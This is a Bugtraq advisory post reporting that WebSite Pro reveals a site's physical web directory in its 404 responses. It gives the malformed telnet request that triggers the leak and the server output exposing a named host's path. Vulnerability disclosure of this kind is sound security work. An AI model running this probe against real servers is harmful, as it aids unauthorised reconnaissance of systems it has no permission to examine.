|
Dear Bugtraqers,
Description:
WebSite Pro is also revealing the webdirectory of
each Website by a simple command line.
This bug is similar to the "IIS revealing
webdirectories" bug reported on bugtraq.
On WebSitePro the diference ist the way you
retrieve the path.
Example:
(Made with MS Windows Telnet Client)
Logfile:
-----------------------------------------------------------------------start-------------------------------------------------------------------
GET /HTTP1.0\ <------ Our
command we send via Telnet on port 80 to the webserver
Response:
Content-length:
186
<HTML><HEAD><TITLE>Document Moved</TITLE></HEAD> <BODY bgcolor="White"><H2>Docume nt Moved</H2> This document has moved <A HREF="http://www.akte.net/HTTP1.0/">here </A>.<P> </BODY></HTML> GET /HTTP1.0/ Content-length: 230 <HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD> <BODY bgcolor="White"><H2>404 Not Found</H2> The requested URL was not found on this server:<P><CODE>/HTTP1.0/<P>( D:\WEBROOTS\VHOSTS\aktenet\htdocs\HTTP1.0)</CODE><P> </BODY></HTML> -------------------------------------------------------------------end-------------------------------------------------------------------
Here it shows us, that the HTML files are in
D:\WEBROOTS\VHOSTS\aktenet\htdocs.
It's not a large threat but an attacker might
gain information about the server which should stay
in Admin's hands. On all Webservers e.g.
MS IIS and Apache the response is "error 404".
-------cut------
Elias: I have some html in this mail, try to send
it as clear text, as it is, please.
Else people with html capable browsers will only
get half of the logfile.
Thx :-)
------cut------
|
